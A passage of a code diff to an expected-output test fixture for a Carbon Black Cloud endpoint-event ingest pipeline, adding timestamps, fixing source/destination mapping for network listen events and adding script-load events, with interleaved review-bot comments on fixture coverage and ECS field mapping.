b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log-expected.json @@ -1,6 +1,7 @@ { "expected": [ { + "@timestamp": "2022-02-10T11:50:51.686Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -103,6 +104,7 @@ } }, { + "@timestamp": "2022-02-10T11:50:36.152Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -201,6 +203,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:55.630Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -323,6 +326,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:40.240Z", "carbon_black_cloud": { "endpoint_event": { "backend": { @@ -444,6 +448,7 @@ ] }, { + "@timestamp": "2022-02-10T11:51:40.177Z", "carbon_black_cloud": { "endpoint_event": { "backend": { 
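Review bot: Replacing the netconn listen event that carried `"remote_port":0,"remote_ip":"127.0.0.1"` with one that has a real remote peer removes the only fixture for a LISTEN event with no remote endpoint, which is exactly the input where the pipeline has to decide what to emit for `source`/`destination` and a port of 0. Keep the removed line as an additional fixture beside the two new listen events instead of dropping it, and add the matching entry to the expected file. Separately, the four added scriptload lines write `"create_time": "…"` with a space after the colon while every other key has none; the JSON parser does not care, but the raw string is echoed verbatim into `event.original` in the expected file, so normalizing it now avoids a cosmetic diff later.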
@@ -565,6 +570,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:37.880Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -686,6 +692,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:39.521Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -807,6 +814,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:36.552Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -928,6 +936,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:38.068Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1027,6 +1036,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:35.068Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1126,6 +1136,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:51:35.443Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1224,6 +1235,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:49:37.539Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1322,6 +1334,7 @@
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:48:14.278Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1361,6 +1374,10 @@
 "ip": "127.0.0.1",
 "port": 62909
 },
+ "destination": {
+ "ip": "127.0.0.1",
+ "port": 49707
+ },
 "ecs": {
 "version": "8.11.0"
 },
@@ -1423,13 +1440,14 @@
 },
 "source": {
 "ip": "127.0.0.1",
- "port": 49707
+ "port": 62909
 },
 "tags": [
 "preserve_original_event"
 ]
 },
 {
+ "@timestamp": "2022-02-10T11:45:02.888Z",
 "carbon_black_cloud": {
 "endpoint_event": {
 "backend": {
@@ -1469,12 +1487,16 @@ "ip": "127.0.0.1", "port": 9716 }, + "destination": { + "ip": "67.43.156.14", + "port": 9001 + }, "ecs": { "version": "8.11.0" }, "event": { "action": "ACTION_CONNECTION_LISTEN", - "original": "{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":0,\"remote_ip\":\"127.0.0.1\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":false,\"netconn_protocol\":\"PROTO_TCP\"}" + "original": 
"{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":9001,\"remote_ip\":\"67.43.156.14\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":false,\"netconn_protocol\":\"PROTO_TCP\"}" }, "host": { "hostname": "DESKTOP-014", 
@@ -1531,13 +1553,128 @@ }, "source": { "ip": "127.0.0.1", - "port": 0 + "port": 9716 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:45:02.888Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:49:36 +0000 UTC" + }, + "device": { + "external_ip": "67.43.156.12", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:45:02.8882089 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Stellar Cyber Inc", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.netconn" + } + }, + "client": { + "ip": "127.0.0.1", + "port": 9716 + }, + "destination": { + "ip": "127.0.0.1", + "port": 9716 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_CONNECTION_LISTEN", + "original": "{\"type\":\"endpoint.event.netconn\",\"process_guid\":\"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7\",\"parent_guid\":\"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4\",\"backend_timestamp\":\"2022-02-10 11:49:36 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"14\",\"device_name\":\"DESKTOP-014\",\"device_external_ip\":\"67.43.156.12\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_CONNECTION_LISTEN\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:45:02.8882089 +0000 UTC\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":9000,\"parent_pid\":720,\"process_publisher\":[{\"name\":\"Stellar Cyber Inc\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | 
FILE_SIGNATURE_STATE_TRUSTED\"}],\"process_path\":\"c:\\\\program files\\\\aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\",\"parent_path\":\"c:\\\\windows\\\\system32\\\\services.exe\",\"process_hash\":[\"6174da1a2dd7594456bbb3ae50ac5587\",\"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515\"],\"parent_hash\":[\"d8e577bf078c45954f4531885478d5a9\",\"dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674\"],\"process_cmdline\":\"\\\"C:\\\\Program Files\\\\Aella\\\\aella_conf_win_srv\\\\aella_conf_win_srv.exe\\\"\",\"parent_cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"remote_port\":9001,\"remote_ip\":\"67.43.156.14\",\"local_port\":9716,\"local_ip\":\"127.0.0.1\",\"netconn_domain\":\"\",\"netconn_inbound\":true,\"netconn_protocol\":\"PROTO_TCP\"}" + }, + "host": { + "hostname": "DESKTOP-014", + "id": "14", + "ip": [ + "67.43.156.12" + ], + "name": "DESKTOP-014", + "os": { + "type": "windows" + } + }, + "network": { + "direction": "inbound", + "transport": "tcp" + }, + "process": { + "command_line": "\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"", + "entity_id": "XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7", + "executable": "c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe", + "hash": { + "md5": "6174da1a2dd7594456bbb3ae50ac5587", + "sha256": "2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515" + }, + "parent": { + "command_line": "C:\\WINDOWS\\system32\\services.exe", + "entity_id": "XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4", + "executable": "c:\\windows\\system32\\services.exe", + "hash": { + "md5": "d8e577bf078c45954f4531885478d5a9", + "sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" + }, + "pid": 720 + }, + "pid": 9000 + }, + "related": { + "hash": [ + 
"2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515", + "6174da1a2dd7594456bbb3ae50ac5587", + "d8e577bf078c45954f4531885478d5a9", + "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674" + ], + "hosts": [ + "DESKTOP-014" + ], + "ip": [ + "67.43.156.14", + "127.0.0.1", + "67.43.156.12" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "source": { + "ip": "67.43.156.14", + "port": 9001 }, "tags": [ "preserve_original_event" ] }, { + "@timestamp": "2022-02-10T11:48:05.272Z", "carbon_black_cloud": { "endpoint_event": { "backend": { 
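Review bot: In the new inbound listen event the `client` object is the local endpoint (`"ip": "127.0.0.1", "port": 9716`) while `source` is the remote peer (`"ip": "67.43.156.14", "port": 9001`) and `destination` repeats the local endpoint, so for `"direction": "inbound"` the expected output pins client and source to different hosts. ECS populates client alongside source and server alongside destination; either the pipeline's client mapping should follow `netconn_inbound` the way source/destination now do, or this fixture is locking in a mismatch that any detection keyed on `client.ip` will inherit. Whether a `server` object is emitted at all is not visible in the hunk, so that part is inferred from the keys shown.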
@@ -1645,6 +1782,450 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2022-02-10T11:48:05.272Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.2725926 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.2725926 +0000 UTC\",\"create_time\": 
\"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring 
Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.272Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.272 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": 
"{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.272 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + 
"name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.200Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + "timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05.2 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + 
"FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05.2 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo 
\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 + }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2022-02-10T11:48:05.000Z", + "carbon_black_cloud": { + "endpoint_event": { + "backend": { + 
